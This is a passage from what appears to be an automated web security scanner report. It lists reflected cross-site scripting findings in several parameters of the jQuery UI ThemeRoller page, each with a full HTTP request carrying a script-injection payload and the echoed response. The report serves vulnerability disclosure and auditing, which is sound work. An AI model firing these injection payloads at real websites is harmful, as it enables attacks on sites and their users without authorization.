tureError=01_flat.png&bgImgOpacityError=10055e29"><script>alert(1)</script>b8d95e5854a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=10055e29"><script>alert(1)</script>b8d95e5854a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png
...[SNIP]...

2.37. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d783"><script>alert(1)</script>2b423fbb9cc was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=209d783"><script>alert(1)</script>2b423fbb9cc&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=209d783"><script>alert(1)</script>2b423fbb9cc&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=6
...[SNIP]...

2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf71a"><script>alert(1)</script>3021fc0395e was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20bf71a"><script>alert(1)</script>3021fc0395e&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20bf71a"><script>alert(1)</script>3021fc0395e&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B100
...[SNIP]...

2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5df9"><script>alert(1)</script>9a2ba1a34a3 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50e5df9"><script>alert(1)</script>9a2ba1a34a3&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50e5df9"><script>alert(1)</script>9a2ba1a34a3&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055
...[SNIP]...

2.40. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 958d8"><script>alert(1)</script>dd7211d45b9 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0958d8"><script>alert(1)</script>dd7211d45b9&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0958d8"><script>alert(1)</script>dd7211d45b9&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" t
...[SNIP]...

2.41. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6979a"><script>alert(1)</script>b2a5040142e was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=1006979a"><script>alert(1)</script>b2a5040142e&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=1006979a"><script>alert(1)</script>b2a5040142e&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.42. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7e1d"><script>alert(1)</script>60f896847d1 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.pngd7e1d"><script>alert(1)</script>60f896847d1&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.pngd7e1d"><script>alert(1)</script>60f896847d1&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4
...[SNIP]...

2.43. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 865b2"><script>alert(1)</script>175935ab28c was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png865b2"><script>alert(1)</script>175935ab28c&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png865b2"><script>alert(1)</script>175935ab28c&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF
...[SNIP]...

2.44. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 725fa"><script>alert(1)</script>a9631e9090e was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png725fa"><script>alert(1)</script>a9631e9090e&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png725fa"><script>alert(1)</script>a9631e9090e&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=
...[SNIP]...

2.45. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db08e"><script>alert(1)</script>da74d127cad was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngdb08e"><script>alert(1)</script>da74d127cad&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOv